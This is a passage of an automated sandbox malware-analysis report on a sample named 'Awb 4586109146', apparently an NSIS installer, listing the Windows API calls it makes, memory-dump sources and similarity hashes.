                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                    • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                                                    • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                    • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                                                    APIs
                                                                      • Part of subcall function 7396121B: GlobalAlloc.KERNELBASE(00000040,?,7396123B,?,739612DF,00000019,739611BE,-000000A0), ref: 73961225
                                                                    • GlobalFree.KERNEL32(?), ref: 73962657
                                                                    • GlobalFree.KERNEL32(00000000), ref: 7396268C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true
                                                                    • Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Free$Alloc
                                                                    • String ID:
                                                                    • API String ID: 1780285237-0
                                                                    • Opcode ID: b2e17fb98df548167ae9262147f30d6befabe8d3f5474c129cc95af9751ea2bc
                                                                    • Instruction ID: eb8bbe19825abbdaab35f39707d6c03bb38f9f15acd61c500de86bae742503bd
                                                                    • Opcode Fuzzy Hash: b2e17fb98df548167ae9262147f30d6befabe8d3f5474c129cc95af9751ea2bc
                                                                    • Instruction Fuzzy Hash: 7D31037210B519EFDB16AF91C894FAA77BAFB85344324453EF5868F260C7309815CB63
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                    • GlobalFree.KERNEL32(?), ref: 00402956
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                    • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                                    • Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                    • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp$C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll
                                                                    • API String ID: 3109718747-589618630
                                                                    • Opcode ID: 838fef82e08b076f5d49a30e748d8985297f415acc20a77e8e630ea48f411f47
                                                                    • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                                                    • Opcode Fuzzy Hash: 838fef82e08b076f5d49a30e748d8985297f415acc20a77e8e630ea48f411f47
                                                                    • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true
                                                                    • Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: FreeGlobal
                                                                    • String ID:
                                                                    • API String ID: 2979337801-0
                                                                    • Opcode ID: ea1ce5d861fe7f685d438c1612a6964d21fa6170e430e2eb62bc9564fc105b85
                                                                    • Instruction ID: d0024a9871b06b06f4edce5b9e104dfbc4111e0dec7516adcb5b7b489bc0517d
                                                                    • Opcode Fuzzy Hash: ea1ce5d861fe7f685d438c1612a6964d21fa6170e430e2eb62bc9564fc105b85
                                                                    • Instruction Fuzzy Hash: B051C532D03159EBEB02DFA4CD407ADBBBEEB44394F18426AD407A3294D6719EC18793
                                                                    APIs
                                                                    • GlobalFree.KERNEL32(00000000), ref: 739624D6
                                                                      • Part of subcall function 7396122C: lstrcpynW.KERNEL32(00000000,?,739612DF,00000019,739611BE,-000000A0), ref: 7396123C
                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 7396245C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73962477
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true
                                                                    • Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                    • String ID:
                                                                    • API String ID: 4216380887-0
                                                                    • Opcode ID: ed48bd0e5735da848dc042d74cba18bfc8092a1c469b6310bf72eefefcfbcaed
                                                                    • Instruction ID: 09524f4e4f5fe15fdeba7793416226dbbffaaea991c96a5959f5d1ead4384bd5
                                                                    • Opcode Fuzzy Hash: ed48bd0e5735da848dc042d74cba18bfc8092a1c469b6310bf72eefefcfbcaed
                                                                    • Instruction Fuzzy Hash: 1D419DB100A709EFD315EF61D844FA677B8FB88754F10492EE58B8B585EB70A484CB63
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,739621EC,?,00000808), ref: 73961635
                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,739621EC,?,00000808), ref: 7396163C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,739621EC,?,00000808), ref: 73961650
                                                                    • GetProcAddress.KERNEL32(739621EC,00000000), ref: 73961657
                                                                    • GlobalFree.KERNEL32(00000000), ref: 73961660
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true
                                                                    • Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                    • String ID:
                                                                    • API String ID: 1148316912-0
                                                                    • Opcode ID: 65f5c366cf1ec65614f6f895060ed0b150562d836593c0a311b3a1fde8c7361a
                                                                    • Instruction ID: 8f227666eb1ac5742b9279a2633dae44e20bee4833a1f3268f18baca3afcc4a6
                                                                    • Opcode Fuzzy Hash: 65f5c366cf1ec65614f6f895060ed0b150562d836593c0a311b3a1fde8c7361a
                                                                    • Instruction Fuzzy Hash: D1F0AC7320B538BBD62126E78C4CD9BBE9CDF8B6F5B210225F62C96190C6619D01D7F1
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                    • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                    • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                                    • Opcode Fuzzy Hash: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                    • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                    • wsprintfW.USER32 ref: 00404B88
                                                                    • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                    • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                                    • Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
                                                                    • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                                    APIs
                                                                    • CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C48
                                                                    • CharNextW.USER32(00000000), ref: 00405C4D
                                                                    • CharNextW.USER32(00000000), ref: 00405C65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext
                                                                    • String ID: C:\
                                                                    • API String ID: 3213498283-3404278061
                                                                    • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                    • Instruction ID: 75375947fb2108fa8988f35f37760ff259c71c6e50658764317197b9124938a5
                                                                    • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                    • Instruction Fuzzy Hash: DAF0BB61908F1199FB3177644C49E7B66BCDB55350B04853FD641B71C0D7F84C818BD9
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405BB1
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 2659869361-4083868402
                                                                    • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                    • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                                                    • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                    • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                    • GetTickCount.KERNEL32 ref: 00402EAA
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                    • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                    • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                                    • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                    • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 004052C5
                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                      • Part of subcall function 0040427D: SendMessageW.USER32(00010438,00000000,00000000,00000000), ref: 0040428F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
